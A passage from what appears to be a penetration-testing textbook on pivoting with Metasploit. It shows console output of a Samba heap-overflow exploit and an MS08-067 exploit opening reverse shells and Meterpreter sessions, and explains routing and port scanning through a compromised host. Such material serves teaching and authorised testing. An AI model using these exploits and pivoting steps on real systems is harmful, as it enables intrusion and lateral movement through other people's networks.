Meterpreter
91
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe411...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe412...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (10.10.1.129:8080 -> 192.168.33.132:1608)
Compare the
LHOST
and
RHOST
variables to the network information
displayed by
ifconfig
. Our
LHOST
option specifies the IP address of our attack-
ing machine. Also notice, the
RHOST
option IP address is set to a different net-
work subnet and that we are attacking systems by tunneling our traffic through
our compromised target to additional systems on the target’s network. We
are leveraging the pivoting attack through Metasploit to pass communica-
tions through our exploited machine to the target machine that resides on
the local subnet. In this case, if the heap overflow is successful, we should be
presented with a reverse shell from 192.168.33.132, simply by leveraging the
network communications on the already compromised machine. When we run
the exploit with
exploit
, we see at that a connection is set up as expected
on a different machine, not the Windows XP machine. Now, to port scan
through the pivot, we would use the
scanner/portscan/tcp
scanner module,
which is built to handle routing through Metasploit.
NOTE
You could also use the
scanner/portscan/tcp
scanner to conduct a series of port
scans through your compromised target on the local subnet itself. We won’t go into the
details here, but just know that you can perform port scanning on a compromised net-
work leveraging this module.
In the preceding examples, we used the
route add
command after we had
compromised the system. Alternatively, to add the routes automatically to
Meterpreter upon a new session spawn, we could use
load auto_add_route
:
msf exploit(ms08_067_netapi) >
load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) >
exploit
[*] Started reverse handler on 10.10.1.129:443
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1090)
[*] AutoAddRoute: Routing new subnet 192.168.33.0/255.255.255.0 through session 1